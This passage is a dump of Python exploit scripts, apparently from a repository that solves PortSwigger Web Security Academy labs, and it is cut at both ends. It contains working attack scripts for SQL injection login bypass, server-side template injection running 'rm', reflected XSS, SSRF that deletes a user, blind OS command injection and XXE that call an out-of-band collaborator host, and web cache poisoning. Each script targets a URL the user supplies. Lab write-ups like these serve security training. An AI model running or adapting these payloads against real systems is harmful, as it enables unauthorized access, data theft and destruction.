44 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
45 | 	args = parser.parse_args()
46 | 	parsed_url = urllib.parse.urlparse(args.url)
47 | 	host = parsed_url.netloc
48 | 	print(parsed_url)
49 | 	url = parsed_url.scheme + '://' + host
50 | 	s = requests.Session()
51 | 	s.proxies = proxies		# Comment this line to disable proxying
52 | 	s.verify = False
53 | 	try:
54 | 		r = s.get(url, allow_redirects=False)
55 | 		time.sleep(1)
56 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
57 | 			print('\n[-] HOST seems to be down <!>')
58 | 			sys.exit(-1)
59 | 		else:
60 | 			print('\n[+] This is the exact same vulnerability seen in the "Exploiting XInclude to retrieve files" lab...\n')
61 | 			input("Press Enter to continue...")
62 | 			print("\n[+] Trying to send a XXE attack to retrieve the content of /etc/passwd...")
63 | 			r = send_xxe(s, url)
64 | 			time.sleep(2)
65 | 			r = s.get(url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
68 | 				print('\n[+] The lab is solved !')
69 | 			elif r.status_code == 200:
70 | 				print('[+] The Exploit sent the given payload !')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/SQLInjection/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # SQL injection vulnerability allowing login bypass
 2 | 
 3 | # https://portswigger.net/web-security/sql-injection/lab-login-bypass
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | from bs4 import BeautifulSoup
12 | import argparse
13 | 
14 | 
15 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
16 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
17 | 
18 | 
19 | ##########################################################
20 | #	FUNCTIONS
21 | ##########################################################
22 | 
23 | def get_csrf_token(r):
24 | 	soup = BeautifulSoup(r.content, 'html.parser')
25 | 	csrf_input = soup.find("input", {'name':'csrf'})
26 | 	csrf = csrf_input['value']
27 | 	print('[+] Found CSRF Token:\t%s' % csrf)
28 | 	return csrf
29 | 
30 | def bypass_login(s, url, payload):
31 | 	login_path = url + "/login"
32 | 	r = s.get(login_path)
33 | 	csrf_token = get_csrf_token(r)
34 | 	login_data = {"username": payload, "password": "Passw0rd!", "csrf": csrf_token}
35 | 	print('\n[+] Using payload:\t%s' % payload)
36 | 	r = s.post(login_path, data=login_data)
37 | 	time.sleep(1)
38 | 	if 'Your username is: administrator' in r.text:
39 | 		print('[+] Logged in as Administrator !')
40 | 		return True
41 | 	else:
42 | 		return False
43 | 
44 | 
45 | ##########################################################
46 | #	MAIN
47 | ##########################################################
48 | 
49 | def main():
50 | 	print('[+] Lab: SQL injection vulnerability allowing login bypass')
51 | 	parser = argparse.ArgumentParser(description="[+] Lab: SQL injection vulnerability allowing login bypass")
52 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
53 | 	args = parser.parse_args()
54 | 	parsed_url = urllib.parse.urlparse(args.url)
55 | 	host = parsed_url.netloc
56 | 	print(parsed_url)
57 | 	url = parsed_url.scheme + '://' + host
58 | 	s = requests.Session()
59 | 	s.proxies = proxies		# Comment this line to disable proxying
60 | 	s.verify = False
61 | 	try:
62 | 		r = s.get(url, allow_redirects=False)
63 | 		time.sleep(1)
64 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
65 | 			print('\n[-] HOST seems to be down <!>')
66 | 			sys.exit(-1)
67 | 		else:
68 | 			print('[+] Trying to bypass login to log as Administrator...\n')
69 | 			# payload = "' OR 1=1--"
70 | 			payload = "administrator'--"
71 | 			if bypass_login(s, url, payload):
72 | 				print('\n[+] SQL Injection successful !')
73 | 				time.sleep(5)
74 | 				s.cookies.clear()
75 | 				s.headers.clear()
76 | 				r = s.get(url)
77 | 				if 'Congratulations, you solved the lab!' in r.text:
78 | 					print('[+] The lab is solved !')
79 | 			else:
80 | 				print('\n[-] SQL Injection Failed <!>')
81 | 	except requests.exceptions.ProxyError:
82 | 		print('[-] PROXY seems to be missconfigured <!>')
83 | 	except KeyboardInterrupt:
84 | 		sys.exit(0)
85 | 
86 | if __name__ == "__main__":
87 | 	main()
88 | 


--------------------------------------------------------------------------------
/SSTI/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Basic server-side template injection
 2 | 
 3 | # https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url):
26 | 	query_param = '/?message='
27 | 	payload = '<% system("rm /home/carlos/morale.txt") %>'
28 | 	inject = payload.replace('%', '%25').replace(' ', '+')
29 | 	print("\n[+] Trying inject payload '%s' on the target website..." % inject)
30 | 	print(f"[+] Sending get request on {query_param}{inject}\n")
31 | 	r = s.get(url + query_param + inject)
32 | 	time.sleep(1)
33 | 	if r.status_code == 200:
34 | 		result = re.search(b"""<div>(.*)\n</div>""", r.text.encode()).group(1)
35 | 	elif r.status_code == 500 and re.search(b"""<p class=is-warning>(.*)</p>""", r.text.encode()):
36 | 		result = re.search(b"""<p class=is-warning>(.*)</p>""", r.text.encode()).group(1)
37 | 	else:
38 | 		print("[-] Command Injection Failed !!!")
39 | 		sys.exit(0)
40 | 	print("[+] %s\'s output:" % url)
41 | 	print('\t%s' % result.decode())
42 | 	print("[+] Command Injection Successful !!!")
43 | 
44 | 
45 | ##########################################################
46 | #	MAIN
47 | ##########################################################
48 | 
49 | def main():
50 | 	print('[+] Lab: Basic server-side template injection')
51 | 	parser = argparse.ArgumentParser(description="[+] Lab: Basic server-side template injection")
52 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
53 | 	args = parser.parse_args()
54 | 	parsed_url = urllib.parse.urlparse(args.url)
55 | 	host = parsed_url.netloc
56 | 	print(parsed_url)
57 | 	url = parsed_url.scheme + '://' + host
58 | 	s = requests.Session()
59 | 	s.proxies = proxies		# Comment this line to disable proxying
60 | 	s.verify = False
61 | 	try:
62 | 		r = s.get(url, allow_redirects=False)
63 | 		time.sleep(1)
64 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
65 | 			print('\n[-] HOST seems to be down <!>')
66 | 			sys.exit(-1)
67 | 		else:
68 | 			print('[+] Trying send Server-Side Template Injection ...\n')
69 | 			time.sleep(1)
70 | 			send_payload(s, url)
71 | 			time.sleep(2)
72 | 			r = s.get(url)
73 | 			if 'Congratulations, you solved the lab!' in r.text:
74 | 				print('[+] The lab is solved !')
75 | 	except requests.exceptions.ProxyError:
76 | 		print('[-] PROXY seems to be missconfigured <!>')
77 | 	except KeyboardInterrupt:
78 | 		sys.exit(0)
79 | 
80 | if __name__ == "__main__":
81 | 	main()
82 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab19.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-double-quotes-encoded-single-quotes-escaped
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | ##########################################################
21 | #	FUNCTIONS
22 | ##########################################################
23 | 
24 | def send_payload(s, url, payload):
25 | 	injection_uri = url + payload
26 | 	r = s.get(injection_uri)
27 | 	time.sleep(1)
28 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
29 | 	print('[+] Using payload:\t%s' % payload)
30 | 	return r
31 | 
32 | def send_xss(s, url):
33 | 	search_path = url + '/?search='
34 | 	xss_payload = """gwyo\\'-alert(1)//"""
35 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
36 | 	return r
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	args = parser.parse_args()
48 | 	parsed_url = urllib.parse.urlparse(args.url)
49 | 	host = parsed_url.netloc
50 | 	print(parsed_url)
51 | 	url = parsed_url.scheme + '://' + host
52 | 	s = requests.Session()
53 | 	s.proxies = proxies		# Comment this line to disable proxying
54 | 	s.verify = False
55 | 	try:
56 | 		r = s.get(url, allow_redirects=False)
57 | 		time.sleep(1)
58 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
59 | 			print('\n[-] HOST seems to be down <!>')
60 | 			sys.exit(-1)
61 | 		else:
62 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
63 | 			r = send_xss(s, url)
64 | 			time.sleep(1)
65 | 			if r.status_code == 200 :
66 | 				s.cookies.clear()
67 | 				s.headers.clear()
68 | 				time.sleep(3)
69 | 				r = s.get(url)
70 | 				if  'Congratulations, you solved the lab!' in r.text:
71 | 					print('[+] The lab is solved')
72 | 				else:
73 | 					print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab21.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-template-literal-angle-brackets-single-double-quotes-backslash-backticks-escaped
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """${alert(1)}"""
37 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 :
68 | 				s.cookies.clear()
69 | 				s.headers.clear()
70 | 				time.sleep(3)
71 | 				r = s.get(url)
72 | 				if  'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved')
74 | 				else:
75 | 					print('[+] The Exploit sent the given payload !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab03.py:
--------------------------------------------------------------------------------
 1 | # Blind XXE with out-of-band interaction
 2 | 
 3 | # https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url, collab):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = """<?xml version="1.0" encoding="UTF-8"?>
28 | <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://""" + collab + """\"> ]><stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>"""
29 | 	headers = {"Content-Type": "application/xml"}
30 | 	print('[+] Using payload:\t%s' % exploit_body)
31 | 	print('[+] Using headers:\t%s' % headers)
32 | 	r = s.post(check_stock_path, data=exploit_body, headers=headers)
33 | 	time.sleep(2)
34 | 	res = r.text
35 | 	print(res)
36 | 	return r
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: Blind XXE with out-of-band interaction')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting XXE to perform SSRF attacks")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	parser.add_argument('-C',dest='collab',required=False, help="Collaborator URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	if args.collab:
57 | 		collab = args.collab
58 | 	else:
59 | 		collab = 'xxxxxxxxxxxxxxxx.oastify.com'
60 | 	try:
61 | 		r = s.get(url, allow_redirects=False)
62 | 		time.sleep(1)
63 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
64 | 			print('\n[-] HOST seems to be down <!>')
65 | 			sys.exit(-1)
66 | 		else:
67 | 			print("[+] Trying send a XXE attack to force the target to send a DNS lookup request...")
68 | 			r = send_xxe(s, url, collab)
69 | 			s.cookies.clear()
70 | 			s.headers.clear()
71 | 			time.sleep(5)
72 | 			r = s.get(url, allow_redirects=False)
73 | 			time.sleep(1)
74 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
75 | 				print('[+] The lab is solved !')
76 | 			elif r.status_code == 200:
77 | 				print('[+] The Exploit sent the given payload !')
78 | 	except requests.exceptions.ProxyError:
79 | 		print('[-] PROXY seems to be missconfigured <!>')
80 | 	except KeyboardInterrupt:
81 | 		sys.exit(0)
82 | 
83 | if __name__ == "__main__":
84 | 	main()
85 | 


--------------------------------------------------------------------------------
/SSRF/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Basic SSRF against the local server
 2 | 
 3 | # https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | check_stock_path = '/product/stock'
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def delete_user(s, url):
28 | 	delete_user_url_ssrf_payload = 'http://localhost/admin/delete?username=carlos'
29 | 	params = {'stockApi': delete_user_url_ssrf_payload}
30 | 	print('[+] Using payload:\t%s' % params)
31 | 	r = s.post(url + check_stock_path, data=params)
32 | 	print("[+] Sending payload...")
33 | 	time.sleep(2)
34 | 	if r.status_code == 200:
35 | 		print(r.text)
36 | 
37 | def check_deleted_user(s, url):
38 | 	admin_ssrf_payload = 'http://localhost/admin'
39 | 	admin_params = {'stockApi': admin_ssrf_payload}
40 | 	r = s.post(url + check_stock_path, data=admin_params)
41 | 	print("[+] Checking if CARLOS user has been deleted...")
42 | 	if 'User deleted successfully' in r.text:
43 | 		print("[+] Successfully deleted CARLOS user !")
44 | 	else:
45 | 		print("[-] Exploit has FAILED to delete carlos user <!>")
46 | 
47 | 
48 | ##########################################################
49 | #	MAIN
50 | ##########################################################
51 | 
52 | def main():
53 | 	print('[+] Lab: Basic SSRF against the local server')
54 | 	parser = argparse.ArgumentParser(description="[+] Lab: Basic SSRF against the local server")
55 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
56 | 	args = parser.parse_args()
57 | 	parsed_url = urllib.parse.urlparse(args.url)
58 | 	host = parsed_url.netloc
59 | 	print(parsed_url)
60 | 	url = parsed_url.scheme + '://' + host
61 | 	s = requests.Session()
62 | 	s.proxies = proxies		# Comment this line to disable proxying
63 | 	s.verify = False
64 | 	try:
65 | 		r = s.get(url, allow_redirects=False)
66 | 		time.sleep(1)
67 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
68 | 			print('\n[-] HOST seems to be down <!>')
69 | 			sys.exit(-1)
70 | 		else:
71 | 			print("\n[+] Trying to delete Carlos user...")
72 | 			delete_user(s, url)
73 | 			time.sleep(2)
74 | 			check_deleted_user(s, url)
75 | 			time.sleep(2)
76 | 			r = s.get(url, allow_redirects=False)
77 | 			time.sleep(1)
78 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
79 | 				print('[+] The lab is solved !')
80 | 			elif r.status_code == 200:
81 | 				print('[+] The Exploit sent the given payload !')
82 | 	except requests.exceptions.ProxyError:
83 | 		print('[-] PROXY seems to be missconfigured <!>')
84 | 	except KeyboardInterrupt:
85 | 		sys.exit(0)
86 | 
87 | if __name__ == "__main__":
88 | 	main()
89 | 


--------------------------------------------------------------------------------
/OSCommandInjection/exploit-lab04.py:
--------------------------------------------------------------------------------
 1 | # Blind OS command injection with out-of-band interaction
 2 | 
 3 | # https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def get_csrf_token(r):
27 | 	soup = BeautifulSoup(r.content, 'html.parser')
28 | 	csrf_input = soup.find("input", {'name':'csrf'})
29 | 	csrf = csrf_input['value']
30 | 	print('[+] Found CSRF Token: %s' % csrf)
31 | 	return csrf
32 | 
33 | def run_nslookup(s, url, collab):
34 | 	submit_path = url + '/feedback/submit'
35 | 	feedback_path = url + '/feedback'
36 | 	command_injection = ' || nslookup %s ||' % collab
37 | 	print("[+] Extracting CSRF Token from the feedback page...")
38 | 	r = s.get(feedback_path)
39 | 	csrf_token = get_csrf_token(r)
40 | 	params = {'email': 'test@test.com' + command_injection, 'name': 'gwyo', 'subject': 'hacked', 'message': 'H4ck3d!!!', 'csrf': csrf_token}
41 | 	print("\n[+] Trying to run command 'nslookup' on the Burp Collaborator...\n")
42 | 	res = s.post(submit_path, data=params)
43 | 
44 | 
45 | ##########################################################
46 | #	MAIN
47 | ##########################################################
48 | 
49 | def main():
50 | 	print('[+] Lab: Blind OS command injection with out-of-band interaction')
51 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind OS command injection with out-of-band interaction")
52 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
53 | 	parser.add_argument('-C',dest='collab',required=True, help="Collaborator URL")
54 | 	args = parser.parse_args()
55 | 	parsed_url = urllib.parse.urlparse(args.url)
56 | 	host = parsed_url.netloc
57 | 	print(parsed_url)
58 | 	url = parsed_url.scheme + '://' + host
59 | 	collab = args.collab
60 | 	s = requests.Session()
61 | 	s.proxies = proxies
62 | 	s.verify = False
63 | 	try:
64 | 		r = s.get(url, allow_redirects=False)
65 | 		time.sleep(1)
66 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
67 | 			print('\n[-] HOST seems to be down <!>')
68 | 			sys.exit(-1)
69 | 		else:
70 | 			print('[+] Trying OS Command Injection force the victim server to send a DNS request to arbitrary address...\n')
71 | 			time.sleep(1)
72 | 
73 | 			run_nslookup(s, url, collab)
74 | 			time.sleep(2)
75 | 			r = s.get(url)
76 | 			print(r)
77 | 			if 'Congratulations, you solved the lab!' in r.text:
78 | 				print('[+] The lab is solved !')
79 | 	except requests.exceptions.ProxyError:
80 | 		print('[-] PROXY seems to be missconfigured <!>')
81 | 	except KeyboardInterrupt:
82 | 		sys.exit(0)
83 | 
84 | if __name__ == "__main__":
85 | 	main()
86 | 


--------------------------------------------------------------------------------
/WebCachePoisoning/exploit-lab05.py:
--------------------------------------------------------------------------------
 1 | # Web cache poisoning via an unkeyed query string
 2 | 
 3 | # https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-unkeyed-query
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_sequence(s, url):
26 | 	cache_poison = "/?gwyo='/><script>alert(1)</script>"
27 | 	print('[+] Trying to poison the cache for the home page:\n\t%s' % cache_poison)
28 | 	cache_url = url + cache_poison
29 | 	s.cookies.clear()
30 | 	solved = False
31 | 	while solved == False:
32 | 		s.headers.clear()
33 | 		s.cookies.clear()
34 | 		r = s.get(url)
35 | 		if 'Congratulations, you solved the lab!' in r.text:
36 | 			print('\n[+] The lab is solved !')
37 | 			solved = True
38 | 			break
39 | 		print('\n[+] Sending cache poisoning request...')
40 | 		headers = {'Origin': url}
41 | 		r = s.get(cache_url, headers=headers, allow_redirects=False)
42 | 		time.sleep(2)
43 | 		if "X-Cache" in r.headers:
44 | 			if r.headers['X-Cache'] == 'hit':
45 | 				s.headers.clear()
46 | 				r = s.get(cache_url, allow_redirects=False)
47 | 				if "X-Cache" in r.headers:
48 | 					if r.headers['X-Cache'] == "hit":
49 | 						print('[+] Cache poisoned')
50 | 						print('[+] Waiting %s seconds before retry...' % str(35 - int(r.headers['Age'])))
51 | 						time.sleep(35 - int(r.headers['Age']))
52 | 					else:
53 | 						print('[+] Received "X-cache: miss"...')
54 | 						time.sleep(2)
55 | 
56 | 
57 | ##########################################################
58 | #	MAIN
59 | ##########################################################
60 | 
61 | def main():
62 | 	print('[+] Lab: Web cache poisoning via an unkeyed query string')
63 | 	parser = argparse.ArgumentParser(description="[+] Lab: Web cache poisoning via an unkeyed query string")
64 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
65 | 	args = parser.parse_args()
66 | 	parsed_url = urllib.parse.urlparse(args.url)
67 | 	host = parsed_url.netloc
68 | 	print(parsed_url)
69 | 	url = parsed_url.scheme + '://' + host
70 | 	s = requests.Session()
71 | 	s.proxies = proxies		# Comment this line to disable proxying
72 | 	s.verify = False
73 | 	try:
74 | 		r = s.get(url, allow_redirects=False)
75 | 		time.sleep(1)
76 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
77 | 			print('\n[-] HOST seems to be down <!>')
78 | 			sys.exit(-1)
79 | 		else:
80 | 			print('[+] Trying to send Web Cache Poisoning attack...\n')
81 | 			time.sleep(1)
82 | 			send_sequence(s, url)
83 | 	except requests.exceptions.ProxyError:
84 | 		print('[-] PROXY seems to be missconfigured <!>')
85 | 	except KeyboardInterrupt:
86 | 		sys.exit(0)
87 | 
88 | if __name__ == "__main__":
89 | 	main()
90 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab04.py:
--------------------------------------------------------------------------------
 1 | # Blind XXE with out-of-band interaction via XML parameter entities
 2 | 
 3 | # https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url, collab):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = """<?xml version="1.0" encoding="UTF-8"?>
28 | <!DOCTYPE Gwyo [ <!ENTITY % xxe SYSTEM "http://""" + collab + """\"> %xxe; ] ><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>"""
29 | 	headers = {"Content-Type": "application/xml"}
30 | 	print('[+] Using payload:\t%s' % exploit_body)
31 | 	print('[+] Using headers:\t%s' % headers)
32 | 	r = s.post(check_stock_path, data=exploit_body, headers=headers)
33 | 	time.sleep(2)
34 | 	res = r.text
35 | 	print(res)
36 | 	return r
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: Blind XXE with out-of-band interaction via XML parameter entities')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind XXE with out-of-band interaction via XML parameter entities")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	parser.add_argument('-C',dest='collab',required=False, help="Collaborator URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	if args.collab:
57 | 		collab = args.collab
58 | 	else:
59 | 		collab = 'xxxxxxxxxxxxxxxx.oastify.com'
60 | 	try:
61 | 		r = s.get(url, allow_redirects=False)
62 | 		time.sleep(1)
63 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
64 | 			print('\n[-] HOST seems to be down <!>')
65 | 			sys.exit(-1)
66 | 		else:
67 | 			print("[+] Trying send a XXE attack to force the target to send a DNS lookup request...")
68 | 			r = send_xxe(s, url, collab)
69 | 			s.cookies.clear()
70 | 			s.headers.clear()
71 | 			time.sleep(5)
72 | 			r = s.get(url, allow_redirects=False)
73 | 			time.sleep(1)
74 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
75 | 				print('[+] The lab is solved !')
76 | 			elif r.status_code == 200:
77 | 				print('[+] The Exploit sent the given payload !')
78 | 	except requests.exceptions.ProxyError:
79 | 		print('[-] PROXY seems to be missconfigured <!>')
80 | 	except KeyboardInterrupt:
81 | 		sys.exit(0)
82 | 
83 | if __name__ == "__main__":
84 | 	main()
85 | 


--------------------------------------------------------------------------------
/Authentication/exploit-lab13.py:
--------------------------------------------------------------------------------
 1 | # Broken brute-force protection, multiple credentials per request
 2 | 
 3 | # https://portswigger.net/web-security/authentication/password-based/lab-broken-brute-force-protection-multiple-credentials-per-request
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
